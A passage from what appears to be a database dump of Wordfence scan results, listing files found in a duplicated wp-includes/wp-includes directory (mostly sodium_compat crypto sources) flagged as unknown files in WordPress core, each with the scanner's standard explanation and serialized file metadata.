More</a>','a:5:{s:4:\"file\";s:60:\"wp-includes/wp-includes/sodium_compat/src/Core/XChaCha20.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34669,1631564716,1631564716,'new','knownfile',75,'ccd811f67066924dc7c88d473318b067','57fe89dede81647e2497453399c219ae','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/src/Core/XSalsa20.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:59:\"wp-includes/wp-includes/sodium_compat/src/Core/XSalsa20.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34670,1631564716,1631564716,'new','knownfile',75,'8eb0c2c28fdb8a4c128dff4b10c49afd','758c918c2916de88352b64a9e48613bc','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/src/Core32/BLAKE2b.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:60:\"wp-includes/wp-includes/sodium_compat/src/Core32/BLAKE2b.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34671,1631564716,1631564716,'new','knownfile',75,'b76c9c5b29f2628f40510f421ec7c6f5','37c7d957541d3e48a19c8cd54e0d7500','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/src/Core32/ChaCha20/Ctx.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:65:\"wp-includes/wp-includes/sodium_compat/src/Core32/ChaCha20/Ctx.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34672,1631564716,1631564716,'new','knownfile',75,'62d70c8a8d07c38f605df696a6b372d7','baf4769c867d450f75cb6f7d5034db97','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/src/Core32/ChaCha20/IetfCtx.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:69:\"wp-includes/wp-includes/sodium_compat/src/Core32/ChaCha20/IetfCtx.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34673,1631564716,1631564716,'new','knownfile',75,'15f7b9e79260e1fe5a2988fbf077a030','02385d943d5f857a1976beca8e99847f','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/src/Core32/ChaCha20.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:61:\"wp-includes/wp-includes/sodium_compat/src/Core32/ChaCha20.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34674,1631564716,1631564716,'new','knownfile',75,'0ded22492ab010af6d6ca9f74a50d40d','4a69953e7c1e3575a79c34af4a8aef58','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/src/Core32/Curve25519/Fe.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:66:\"wp-includes/wp-includes/sodium_compat/src/Core32/Curve25519/Fe.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34675,1631564716,1631564716,'new','knownfile',75,'60714a7a464ab61e5ba9f5008a9f0eb0','b6c54160be7da60c5a64e2db667735d2','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/src/Core32/Curve25519/Ge/Cached.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:73:\"wp-includes/wp-includes/sodium_compat/src/Core32/Curve25519/Ge/Cached.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34676,1631564716,1631564716,'new','knownfile',75,'34db436e2fb6466a78bb435c279d6c48','b1db6f640c6d7189f8e064bc31991964','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/src/Core32/Curve25519/Ge/P1p1.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:71:\"wp-includes/wp-includes/sodium_compat/src/Core32/Curve25519/Ge/P1p1.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34677,1631564716,1631564716,'new','knownfile',75,'400794c311670e6e696ee8ecd3cc1917','1dc02e20955bb77f90aa0b0e770eb321','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/src/Core32/Curve25519/Ge/P2.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:69:\"wp-includes/wp-includes/sodium_compat/src/Core32/Curve25519/Ge/P2.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34678,1631564716,1631564716,'new','knownfile',75,'fe41a2b0faab6567002b373d98539a0a','b462cd7823fda33dcdfaab3f706531e0','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/src/Core32/Curve25519/Ge/P3.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:69:\"wp-includes/wp-includes/sodium_compat/src/Core32/Curve25519/Ge/P3.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34679,1631564716,1631564716,'new','knownfile',75,'94419a4e0f8b7bf48f361ec239d01850','cf53bbd039d3bfaa3574da91fe1d14a4','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/src/Core32/Curve25519/Ge/Precomp.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:74:\"wp-includes/wp-includes/sodium_compat/src/Core32/Curve25519/Ge/Precomp.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34680,1631564716,1631564716,'new','knownfile',75,'6e446275e173ed1840ca612e6cb9c866','7d7460ef65637adde6a184eb55d4a4b5','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/src/Core32/Curve25519/H.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:65:\"wp-includes/wp-includes/sodium_compat/src/Core32/Curve25519/H.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34681,1631564716,1631564716,'new','knownfile',75,'2580c54fd72673c9952eba20341148f0','f0d3b7019796207c6b9dd58ae151824d','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/src/Core32/Curve25519/README.md','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:69:\"wp-includes/wp-includes/sodium_compat/src/Core32/Curve25519/README.md\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34682,1631564716,1631564716,'new','knownfile',75,'5e3d37efb36f0f74db0e1dca53cbea2e','77f254edfefafd88ebcf0c55ea0c1e7f','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/src/Core32/Curve25519.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:63:\"wp-includes/wp-includes/sodium_compat/src/Core32/Curve25519.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34683,1631564716,1631564716,'new','knownfile',75,'f93ceeb9e8c1fec867d6d24508b0451c','a2f78206f975c4b0b53f9577805baebd','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/src/Core32/Ed25519.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:60:\"wp-includes/wp-includes/sodium_compat/src/Core32/Ed25519.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34684,1631564717,1631564717,'new','knownfile',75,'3051fd827b8a1a97ca4e638f9623b4f2','60e1f3c9eecf1179424954ec485834da','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/src/Core32/HChaCha20.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:62:\"wp-includes/wp-includes/sodium_compat/src/Core32/HChaCha20.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34685,1631564717,1631564717,'new','knownfile',75,'c01002e8a54959ceac2c93650827ba3f','5b4f89d93d55fa66b0e032cc4a0f49a6','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/src/Core32/HSalsa20.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:61:\"wp-includes/wp-includes/sodium_compat/src/Core32/HSalsa20.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34686,1631564717,1631564717,'new','knownfile',75,'414123b260588254ff4663cbcb772245','05c21a2fea8738bca8f787d4e891114e','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/src/Core32/Int32.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:58:\"wp-includes/wp-includes/sodium_compat/src/Core32/Int32.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34687,1631564717,1631564717,'new','knownfile',75,'a9cf847c5cb3be580a83a226a224f108','9ac01d0b1b54c210895887ba365656fe','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/src/Core32/Int64.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:58:\"wp-includes/wp-includes/sodium_compat/src/Core32/Int64.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34688,1631564717,1631564717,'new','knownfile',75,'622e6112c4837ac1c5363a35b59b7233','4cea3965801d41425c0f3b0220c7590b','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/src/Core32/Poly1305/State.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:67:\"wp-includes/wp-includes/sodium_compat/src/Core32/Poly1305/State.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34689,1631564717,1631564717,'new','knownfile',75,'035893ec5a2997350e53a09dd52ad37c','50e44f6c4c178a5087f85fd5fba3545f','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/src/Core32/Poly1305.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:61:\"wp-includes/wp-includes/sodium_compat/src/Core32/Poly1305.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34690,1631564717,1631564717,'new','knownfile',75,'821778629042c1e533fc4d3b4ddb3092','d09263905d6e5f02370a8641223998b9','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/src/Core32/Salsa20.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:60:\"wp-includes/wp-includes/sodium_compat/src/Core32/Salsa20.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34691,1631564717,1631564717,'new','knownfile',75,'a1e38a029962af675fb672c31480d6cc','563b7ce4fcb795f9a7376b482619f747','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/src/Core32/SecretStream/State.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:71:\"wp-includes/wp-includes/sodium_compat/src/Core32/SecretStream/State.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34692,1631564717,1631564717,'new','knownfile',75,'25736c0ae1a97a5d6346cbc4a1fdb547','5df168570630d1c957472a721492d592','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/src/Core32/SipHash.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:60:\"wp-includes/wp-includes/sodium_compat/src/Core32/SipHash.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34693,1631564717,1631564717,'new','knownfile',75,'3b43cd54394309e938f3c9f309956370','964fbd1d63e9337173cfd08503b01745','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/src/Core32/Util.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:57:\"wp-includes/wp-includes/sodium_compat/src/Core32/Util.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34694,1631564717,1631564717,'new','knownfile',75,'ccdbc4002156b080aaff7070e71c4280','f958cb00444c2220017139993b34c317','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/src/Core32/X25519.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:59:\"wp-includes/wp-includes/sodium_compat/src/Core32/X25519.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34695,1631564717,1631564717,'new','knownfile',75,'60472b312239dc36baf7d2f4cb6fd25f','bcdac32ecd65c4a7a17e43d3300fcfb8','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/src/Core32/XChaCha20.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:62:\"wp-includes/wp-includes/sodium_compat/src/Core32/XChaCha20.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34696,1631564717,1631564717,'new','knownfile',75,'a8f454abde3d33e60cbaaaf28c15d74a','a14f74187c0049da59e4dc5e29ff7a3e','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/src/Core32/XSalsa20.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:61:\"wp-includes/wp-includes/sodium_compat/src/Core32/XSalsa20.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34697,1631564717,1631564717,'new','knownfile',75,'a145ed818015a732ac343ae6e486fd90','7eff80c4cae4d3f94e20e5c69e2f38b7','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/src/Crypto.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:52:\"wp-includes/wp-includes/sodium_compat/src/Crypto.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34698,1631564717,1631564717,'new','knownfile',75,'2fda5c790c5f2e243fdba418ec2aafd3','671458811ca55ada8c68214ef84126a7','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/src/Crypto32.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:54:\"wp-includes/wp-includes/sodium_compat/src/Crypto32.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34699,1631564717,1631564717,'new','knownfile',75,'338805946e3069a258cb962c01d11889','1684b3fb0b870345bd45a9313379306d','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/src/File.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:50:\"wp-includes/wp-includes/sodium_compat/src/File.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34700,1631564717,1631564717,'new','knownfile',75,'0a8342e75b9545f4d31fbe4e7ebb684d','523f32b05f684acab7421b62d75fcd58','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/src/PHP52/SplFixedArray.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:65:\"wp-includes/wp-includes/sodium_compat/src/PHP52/SplFixedArray.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34701,1631564717,1631564717,'new','knownfile',75,'c496a292944abff6405981e65d5fc306','78bfa79d41c905ab288d2c7b61f5a469','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/src/SodiumException.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:61:\"wp-includes/wp-includes/sodium_compat/src/SodiumException.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34702,1631564717,1631564717,'new','knownfile',75,'4c6c89ec2447104b1072e9b5a30d46e5','765bc22e689eb8f36895414cceb955c0','Unknown file in WordPress core: wp-includes/wp-includes/spl-autoload-compat.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:47:\"wp-includes/wp-includes/spl-autoload-compat.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34703,1631564717,1631564717,'new','knownfile',75,'f5916775e0ffff562b4b27d1c675fc0f','c1bf86a375b8e03a354a18f266fc90a4','Unknown file in WordPress core: wp-includes/wp-includes/taxonomy.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:36:\"wp-includes/wp-includes/taxonomy.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34704,1631564717,1631564717,'new','knownfile',75,'6ecc8dc5eec9890ed3723c23bfe502de','84448ec82eb5039f8fe1d5fe92234fc3','Unknown file in WordPress core: wp-includes/wp-includes/template-loader.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:43:\"wp-includes/wp-includes/template-loader.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34705,1631564717,1631564717,'new','knownfile',75,'52e793768eee5f73b8b5359f91260a58','1065f87808e9b29bc585e059481160af','Unknown file in WordPress core: wp-includes/wp-includes/template.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:36:\"wp-includes/wp-includes/template.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34706,1631564718,1631564718,'new','knownfile',75,'a6342d31f853eb7e8893ef6b936fb16c','a9a379fdbfc07038304efb01221f3e35','Unknown file in WordPress core: wp-includes/wp-includes/theme-compat/comments.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:49:\"wp-includes/wp-includes/theme-compat/comments.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34707,1631564718,1631564718,'new','knownfile',75,'63046dd74d8c43d3592a59a7c1203e45','2c6213678cd62ad01ee894c2e250cab0','Unknown file in WordPress core: wp-includes/wp-includes/theme-compat/embed-404.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a 